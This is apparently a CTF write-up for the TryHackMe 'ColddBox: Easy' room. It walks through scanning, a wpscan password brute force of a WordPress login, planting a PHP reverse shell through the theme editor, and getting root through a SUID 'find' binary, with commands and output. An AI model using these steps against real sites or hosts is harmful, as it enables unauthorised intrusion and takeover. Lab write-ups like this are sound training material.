Skip to main content

ColddBox Easy WriteUp

This is my write ups for ColddBox: Easy Room on Try Hack Me.

This room is a CTF type of room

I will try to go deep into the technical thing we do in this room.

Task 1 - boot2root

Enum

  • Always start with create a nmap directory to store nmap scans
mkdir nmap

nmap -sC -sV -T4 -v -oN nmap/initial_scan $IP
## nmap scan result
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ColddBox | One more machine
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

rustscan -a $IP -- -oN nmap/rustscan
## rustscan result
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack
4512/tcp open  unknown syn-ack
  • Since they have a web server running, we going to do gobuster brute force
gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob_1.log
## Gobuster result
/wp-content           (Status: 301) [Size: 317] [--> http://10.10.42.232/wp-content/]
/wp-includes          (Status: 301) [Size: 318] [--> http://10.10.42.232/wp-includes/]
/wp-admin             (Status: 301) [Size: 315] [--> http://10.10.42.232/wp-admin/]
/hidden               (Status: 301) [Size: 313] [--> http://10.10.42.232/hidden/]

  • With this we can safely assume that they are running wordpress, we can go over to http://$IP/wp-login.php to try and login

  • From the htt://$IP/hidden we can find some potential usernames

The hiddent page

c0ldd
hugo
philip

Foot hold

  • With this we can perform brute force login the website using wpscan
tip

Put the potential usernames into a file called user.txt

wpscan --url http://$IP/wp-login.php -U user.txt -P /usr/share/wordlists/rockyou.txt

[SUCCESS] - c0ldd / [REDACTED]

  • Login to the web page and navigate to theme-editor in http://$IP/wp-admin/theme-editor.php

  • Put the content of php-reverse-shell to the 404.php template

Don't forget

Remember to edit the $IP and $PORT on php-reverse-shell to match with your

  • Set up a listener and go over to http://$IP/wp-content/themes/twentyfifteen/404.php to make a callback

  • Upgrade the shell with python or python3

python3 -c 'import pty;pty.spawn("/bin/bash")';

export TERM=xterm

PrivEsc

  • Perform some standard thing that we should always do
getcap -r / 2>/dev/null
## result
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep


find / -uid 0 -perm -4000 -type f 2>/dev/null
## result
/bin/su
/bin/ping6
/bin/ping
/bin/fusermount
/bin/umount
/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/find
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

  • We can become root with this find . -exec /bin/sh -p \; -quit

  • Getting all the flags

Get the flags
cat /home/c0ldd/user.txt /root/root.txt
[REDACTED]
Last updated on